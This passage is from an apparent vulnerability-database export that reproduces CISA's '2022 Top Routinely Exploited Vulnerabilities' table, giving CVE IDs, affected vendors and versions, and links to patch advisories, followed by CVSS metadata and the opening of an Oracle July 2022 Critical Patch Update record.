1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Alert - Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - update 1\" ) \n \n[CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882> \"CVE-2020-14882\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883> \"CVE-2020-14883\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016> \"CVE-2021-20016\" )\n\n| \n\nSonicWALL\n\n| \n\nSSLVPN SMA100, Build Version 10.x\n\n| \n\n[Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001> \"CONFIRMED ZERO-DAY VULNERABILITY IN THE SONICWALL SMA100 BUILD VERSION 10.X\" )\n\n| \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855> \"CVE-2021-26855\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n 
\n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | Microsoft | Exchange Server, Multiple Versions | [Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) | \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a>) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858> \"CVE-2021-26858\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065> \"CVE-2021-27065\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021> \"CVE-2021-20021\" )\n\n| \n\nSonicWALL\n\n| \n\nEmail Security version 10.0.9.x Email Security\n\n| \n\n[SonicWall Email Security pre-authentication administrative account creation vulnerability](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007> \"SONICWALL EMAIL SECURITY PRE-AUTHENTICATION ADMINISTRATIVE ACCOUNT 
CREATION VULNERABILITY\" )\n\n| \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207> \"Microsoft Exchange Server Security Feature Bypass Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" )\n\nACSC Alert:\n\n[Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/about-us/alerts/microsoft-exchange-proxyshell-targeting-australia> \"Microsoft Exchange ProxyShell Targeting in Australia\" ) \n \n[CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1\n\n| \n\n[Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html> \"Confluence Security Advisory 2022-06-02\" )\n\n| \n\nCISA Alert:\n\n[CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog](<https://www.cisa.gov/news-events/alerts/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog> \"CISA Adds One Known Exploited Vulnerability \\(CVE-2022-26134\\) to Catalog\u202f\u202f\" )\n\nACSC Alert:\n\n[Remote code execution vulnerability present in Atlassian Confluence Server and Data Center](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence> \"Remote code execution vulnerability present in Atlassian Confluence Server and 
Data Center\" ) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nJoint CSA:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" ) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )\n\n| \n\nMicrosoft\n\n| \n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nMicrosoft Exchange Server 2016 Cumulative Updates 19 and 20\n\nMicrosoft Exchange Server 2019 Cumulative Updates 8 and 9\n\n| \n\n[Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523> \"Microsoft Exchange Server Elevation of Privilege Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" ) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )\n\n| \n\nJira Atlassian\n\n| \n\nConfluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n| \n\n[Jira Atlassian: Confluence Server Webwork OGNL injection - 
CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940> \"Confluence Server Webwork OGNL injection - CVE-2021-26084\" )\n\n| \n\nCISA Alert:\n\n[Atlassian Releases Security Updates for Confluence Server and Data Center](<https://www.cisa.gov/news-events/alerts/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data-center> \"Atlassian Releases Security Updates for Confluence Server and Data Center\" ) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )\n\n| \n\nZoho ManageEngineCorp.\n\n| \n\nManageEngine ADSelfService Plus builds up to 6113\n\n| \n\n[Security advisory - ADSelfService Plus authentication bypass vulnerability](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html> \"Security advisory - ADSelfService Plus authentication bypass vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors](<https://www.cyber.gov.au/about-us/alerts/critical-vulnerability-manageengine-adselfservice-plus-exploited-cyber-actors> \"Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors\" ) \n \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438> \"CVE-2021-40438\" )\n\n| \n\nApache\n\n| \n\nHTTP Server 2.4.48\n\n| | \n \n[CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \"CVE-2021-41773\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.49\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n \n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013> \"CVE-2021-42013\" )\n\n| \n\nApache\n\n| \n\nApache HTTP Server 2.4.50\n\n| \n\n[Apache HTTP Server 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html> \"Apache HTTP Server 2.4 vulnerabilities\" )\n\n| \n 
\n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038> \"CVE-2021-20038\" )\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv\n\n| \n\n[SonicWall patches multiple SMA100 affected vulnerabilities](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026> \"SONICWALL PATCHES MULTIPLE SMA100 AFFECTED VULNERABILITIES\" )\n\n| \n\nACSC Alert:\n\n[Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\n_CCCS Alert:_\n\n[SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4> \"SonicWall security advisory\" ) \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\n[For other affected vendors and products, see CISA's GitHub repository.](<https://github.com/cisagov/log4j-affected-db>)\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a> \"Mitigating Log4Shell and Other Log4j-Related Vulnerabilities\" )\n\n| \n\nCISA webpage:\n\n[Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n_CCCS Alert:_\n\n[Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability> \"Alert - Active exploitation of Apache Log4j vulnerability - update 7\" )\n\nACSC Advisory:\n\n[2021-007: Log4j vulnerability \u2013 advice and 
mitigations](<https://www.cyber.gov.au/about-us/advisories/2021-007-log4j-vulnerability-advice-and-mitigations> \"2021-007: Log4j vulnerability \u2013 advice and mitigations\" )\n\nACSC Publication:\n\n[Log4j: What Boards and Directors Need to Know](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/log4j-what-boards-and-directors-need-know> \"Log4j: What Boards and Directors Need to Know\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j 2.15.0\n\n| \n\n[Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html> \"Apache Log4j Security Vulnerabilities\" )\n\n| \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and\n\nFortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier\n\n| \n\n[FortiOS - heap-based buffer overflow in sslvpnd](<https://www.fortiguard.com/psirt/FG-IR-22-398> \"FortiOS - heap-based buffer overflow in sslvpnd\" )\n\n| \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1)\n\n| \n\n[Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P30> \"Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release\" )\n\n| \n \n[CVE-2022-22536](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nNetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)\n\n| \n\n[Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP 
Content Server and SAP Web Dispatcher](<https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/> \"Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher\" )\n\n| \n\nCISA Alert:\n\n[Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)](<https://www.cisa.gov/news-events/alerts/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing> \"Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager \\(ICM\\)\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzu\n\n| \n\nSpring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions\n\n| \n\n[CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://spring.io/security/cve-2022-22963> \"CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression\" )\n\n| \n \n[CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.x\n\nWorkspace ONE Access and Identity Manager\n\n| \n\n[VMware Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0\n\nIdentity Manager (vIDM) and vRealize Automation 3.3.6, 3.3.5, 3.3.4, 3.3.3\n\nvRealize 
Automation (vIDM), 8.x, 7.6\n\nVMware Cloud Foundation (vIDM), 4.x\n\nVMware Cloud Foundation (vRA), 3.x\n\nvRealize Suite Lifecycle Manager (vIDM), 8.x\n\n| \n\n[VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html> \"VMSA-2022-0011\" )\n\n| \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nWSO2\n\n| \n\nWSO2 API Manager 2.2.0 and above through 4.0.0\n\nWSO2 Identity Server 5.2.0 and above through 5.11.0 \n\nWSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0\n\nWSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0\n\nWSO2 Enterprise Integrator 6.2.0 and above through 6.6.0\n\n| \n\n[WSO2 Documentation - Spaces](<https://wso2docs.atlassian.net/wiki/spaces> \"Spaces\" )\n\n| \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite, 8.8.15 and 9.0\n\n| \n\n[Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1#Security_Fixes> \"Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release\" )\n\n| \n \n[CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )\n\n| \n\nF5 Networks\n\n| \n\nF5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions\n\n| \n\n[K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388](<https://my.f5.com/manage/s/article/K23605346> \"K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388\" )\n\n| \n\nJoint CSA:\n\n[Threat Actors Exploiting F5 BIG-IP CVE-2022-1388](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a> \"Threat Actors Exploiting F5 BIG-IP CVE-2022-1388\" ) \n \n[CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple 
Versions\n\n| | \n\nCISA Alert:\n\n[Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability](<https://www.cisa.gov/news-events/alerts/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability> \"Microsoft Releases Workaround Guidance for MSDT \\\"Follina\\\" Vulnerability\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047> \"Windows Client Server Run-time Subsystem \\(CSRSS\\) Elevation of Privilege Vulnerability\" )\n\n| \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nCertain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage\n\n| \n\n[DeadBolt Ransomware](<https://www.qnap.com/en/security-advisory/qsa-22-24> \"DeadBolt Ransomware\" )\n\n| \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nACSC Alert:\n\n[Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.](<https://www.cyber.gov.au/about-us/alerts/vulnerability-alert-2-new-vulnerabilities-associated-microsoft-exchange> \"Vulnerability Alert \u2013 2 new Vulnerabilities associated with Microsoft Exchange.\" ) \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| 
\n\nFortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0\n\n| \n\n[FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface](<https://www.fortiguard.com/psirt/FG-IR-22-377> \"FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface\" )\n\n| \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-03T12:00:00", "type": "ics", "title": "2022 Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-13379", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-5902", "CVE-2021-20016", "CVE-2021-20021", "CVE-2021-20038", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40438", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-44228", "CVE-2021-45046", 
"CVE-2022-1388", "CVE-2022-22047", "CVE-2022-22536", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22963", "CVE-2022-24682", "CVE-2022-26134", "CVE-2022-27593", "CVE-2022-27924", "CVE-2022-29464", "CVE-2022-30190", "CVE-2022-40684", "CVE-2022-41082", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2023-08-03T12:00:00", "id": "AA23-215A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2023-09-30T02:41:45", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 349 new security patches across the product families listed below. 
Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2880220.1>).\n\n**Please note that since the release of the April 2022 Critical Patch Update, Oracle has released a Security Alert for Oracle E-Business Suite [CVE-2022-21500 (May 19, 2022)](<https://www.oracle.com/security-alerts/alert-cve-2022-21500.html>). Customers are strongly advised to apply the July 2022 Critical Patch Update for Oracle E-Business Suite, which includes patches for this Alert as well as additional patches.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1259", "CVE-2018-1273", "CVE-2018-1274", "CVE-2018-18074", "CVE-2018-25032", "CVE-2018-8032", "CVE-2019-0219", "CVE-2019-0220", "CVE-2019-0227", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-17495", 
"CVE-2019-17571", "CVE-2019-20916", "CVE-2019-9636", "CVE-2019-9740", "CVE-2020-0404", "CVE-2020-10683", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11987", "CVE-2020-13974", "CVE-2020-14343", "CVE-2020-1747", "CVE-2020-17521", "CVE-2020-1927", "CVE-2020-25649", "CVE-2020-26137", "CVE-2020-26184", "CVE-2020-26185", "CVE-2020-26237", "CVE-2020-27619", "CVE-2020-27820", "CVE-2020-28052", "CVE-2020-28491", "CVE-2020-28500", "CVE-2020-29396", "CVE-2020-29505", "CVE-2020-29506", "CVE-2020-29507", "CVE-2020-29508", "CVE-2020-29651", "CVE-2020-35163", "CVE-2020-35164", "CVE-2020-35166", "CVE-2020-35167", "CVE-2020-35168", "CVE-2020-35169", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36518", "CVE-2020-4788", "CVE-2020-5258", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-7656", "CVE-2020-7712", "CVE-2020-9484", "CVE-2020-9492", "CVE-2021-20322", "CVE-2021-21781", "CVE-2021-22118", "CVE-2021-22119", "CVE-2021-22931", "CVE-2021-22939", "CVE-2021-22940", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23337", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23926", "CVE-2021-26291", "CVE-2021-29154", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-31684", "CVE-2021-3177", "CVE-2021-31805", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-33560", "CVE-2021-33813", "CVE-2021-34141", "CVE-2021-34429", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-35043", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-3572", "CVE-2021-35940", "CVE-2021-36090", "CVE-2021-3612", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3672", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37159", "CVE-2021-3737", "CVE-2021-3743", "CVE-2021-3744", "CVE-2021-3749", "CVE-2021-3752", "CVE-2021-37714", "CVE-2021-3772", "CVE-2021-3773", "CVE-2021-37750", 
